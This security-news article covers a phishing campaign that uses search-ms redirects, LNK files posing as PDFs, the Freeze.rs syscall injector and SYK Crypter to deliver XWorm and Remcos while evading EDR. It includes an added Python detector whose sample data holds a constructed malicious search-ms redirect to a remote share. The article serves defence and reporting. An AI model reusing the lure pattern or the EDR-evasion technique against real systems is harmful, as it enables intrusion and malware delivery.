XWorm, Remcos RAT Evade EDRs to Infect Critical Infrastructure

Disguised as harmless PDF documents, LNK files trigger a PowerShell script, initiating a Rust-based injector called Freeze[.]rs and a host of malware infections.


The Rust-based injector Freeze[.]rs has been weaponized to introduce a raft of malware to targets, in a sophisticated phishing campaign containing a malicious PDF file that gets around endpoint detection and response (EDR).

First discovered by Fortinet's FortiGuard Labs in July, the campaign is targeting victims across Europe and North America, including specialty chemical or industrial product suppliers.

Eventually, this chain culminates in the loading of XWorm malware, which establishes communication with a command-and-control (C2) server, an analysis by the firm revealed. XWorm can carry out a wide range of functions, from loading ransomware to acting as a persistent backdoor.

Further revelations also unveiled the involvement of SYK Crypter, a tool frequently utilized to distribute malware families via the Discord community chat platform. This crypter played a role in loading Remcos, a sophisticated remote access Trojan (RAT) adept at controlling and monitoring Windows devices.

Putting EDR on Ice: Under the Hood of the Freeze[.]rs Attack Chain

In their investigation, the team's analysis of encoded algorithms and API names traced the origin of this novel injector back to the Red Team tool "Freeze.rs," designed explicitly for crafting payloads capable of bypassing EDR security measures.

"This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," a company blog post explained. "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions."

Cara Lin, a researcher at FortiGuard Labs, explains that the Freeze[.]rs injector calls NT syscalls directly to inject the shellcode, skipping the standard API calls in kernelbase.dll, which may be hooked.

"They use the slight delay that occurs before an EDR starts hooking and altering the assembly of system DLLs within a process," she says. "If a process is created in a suspended state, it has minimal DLLs loaded, and no EDR-specific DLLs are loaded, indicating that the syscalls within Ntdll.dll remain unaltered."

Lin explains the attack chain is initiated through a booby-trapped PDF file, which works together with a "search-ms" protocol to deliver the payload.

The JavaScript in this chain uses the "search-ms" functionality to reveal the LNK file located on a remote server.

The "search-ms" protocol can redirect users to a remote server via a Windows Explorer Window.

"Through the use of a deceptive LNK file disguised as a PDF icon, it can deceive victims into believing that the file originates from their own system and is legitimate," she notes.
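The "search-ms" redirect described above can be hunted for in content before it reaches a user. The following is an added example, not FortiGuard's or Dark Reading's code: a small scanner that pulls search-ms: URIs out of HTML, JavaScript or mail bodies, parses the common parameter layout (query=, crumb=location:, displayname=), and flags any whose location points Explorer at a UNC share or URL rather than a local folder. The sample content and hosts below are constructed for illustration; the assumption is that attacker-delivered URIs use the standard search-ms parameter names.

```python
"""Detect search-ms: URIs that point Windows Explorer at a remote location.

Added example (not the page's or FortiGuard's code).  Assumes the usual
search-ms layout: query=..., crumb=location:..., displayname=...
The sample content below is constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# A search-ms: URI runs until whitespace or a quote/bracket closes it.
SEARCH_MS_RE = re.compile(r"search-ms:[^\s\"'<>)]+", re.IGNORECASE)


@dataclass
class Finding:
    uri: str          # raw URI as found in the content
    location: str     # value after "crumb=location:" ("" if absent)
    remote: bool      # True when the location is a UNC path or URL
    lnk_hint: bool    # True when ".lnk" appears in query/displayname
    displayname: str  # title Explorer shows; attacker-controlled text


def parse_search_ms(uri: str) -> dict:
    """Split 'search-ms:k1=v1&k2=v2' into a lower-cased key dict, decoding %xx."""
    body = uri.split(":", 1)[1]
    params = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        if key:
            params[key.lower()] = unquote(value)
    return params


def is_remote_location(location: str) -> bool:
    """UNC shares (\\\\host\\share, including WebDAV-style \\\\host@80\\share)
    and http(s) URLs send Explorer off the local machine."""
    loc = location.strip().lower()
    return loc.startswith("\\\\") or loc.startswith(("http://", "https://"))


def classify(uri: str) -> Finding:
    params = parse_search_ms(uri)
    crumb = params.get("crumb", "")
    location = crumb[len("location:"):] if crumb.lower().startswith("location:") else ""
    text = (params.get("query", "") + " " + params.get("displayname", "")).lower()
    return Finding(
        uri=uri,
        location=location,
        remote=is_remote_location(location),
        lnk_hint=".lnk" in text,
        displayname=params.get("displayname", ""),
    )


def scan(content: str) -> list:
    """Return a Finding for every search-ms: URI in the content."""
    return [classify(m.group(0)) for m in SEARCH_MS_RE.finditer(content)]


def remote_findings(content: str) -> list:
    """Only the URIs that would open a remote share or URL in Explorer."""
    return [f for f in scan(content) if f.remote]


# Constructed sample: one redirect to a remote share with a spoofed
# "Downloads" title, one benign local search, one percent-encoded remote URI.
SAMPLE_CONTENT = r'''<html><script>
window.location.href = "search-ms:query=Quotation.pdf&crumb=location:\\198.51.100.23\share&displayname=Downloads";
</script></html>
<a href="search-ms:query=budget&crumb=location:C:\Users\alice\Documents">local search</a>
<a href="search-ms:query=invoice.lnk&crumb=location%3A%5C%5Cfiles.example.net%5Cpublic&displayname=My%20Documents">open</a>
'''

if __name__ == "__main__":
    for f in remote_findings(SAMPLE_CONTENT):
        print(f"REMOTE search-ms -> {f.location!r} shown as {f.displayname!r} "
              f"(lnk hint: {f.lnk_hint})")
```

The displayname value is worth surfacing in any alert: it is the title the Explorer window will carry, which is exactly what lets a remote share pass for a local folder. Percent-encoded variants are decoded before classification so that an encoded `\\` is not mistaken for a local path.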

Meanwhile, "the SYK Crypter copies itself to the Startup folder for persistence, encrypts the configuration during encoding and decrypts it upon execution, and also encrypts the compressed payload in the resource for obfuscation," she adds.

A downloader is used together with encoding in the first layer; a second layer then adds string obfuscation and payload encryption.

"This multi-layered strategy is designed to enhance the complexity and challenge for static analysis," she says. "Finally, it can terminate itself upon recognizing a specific security vendor."

How to Defend Against Mounting Phishing Risk

Phishing and other messaging-based attacks continue to be a pervasive threat, with 97% of companies seeing at least one email phishing attack in the past 12 months and three-quarters of firms expecting significant costs from an email-based attack.

Phishing attacks are getting smarter and more targeted, adapting to new technology and user behavior, evolving to include mobile exploits, brand impersonation, and AI-generated content.

The research notes that it's crucial to keep software up to date to mitigate risk, provide regular training, and use advanced security tools for defense in order to counter the evolving threat of phishing attacks.

Phishing simulation training for employees appears to work better at critical infrastructure organizations than it does across other sectors, with 66% of those employees correctly reporting at least one real malicious email attack within a year of training, new research has found.

About the Author(s)

Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.
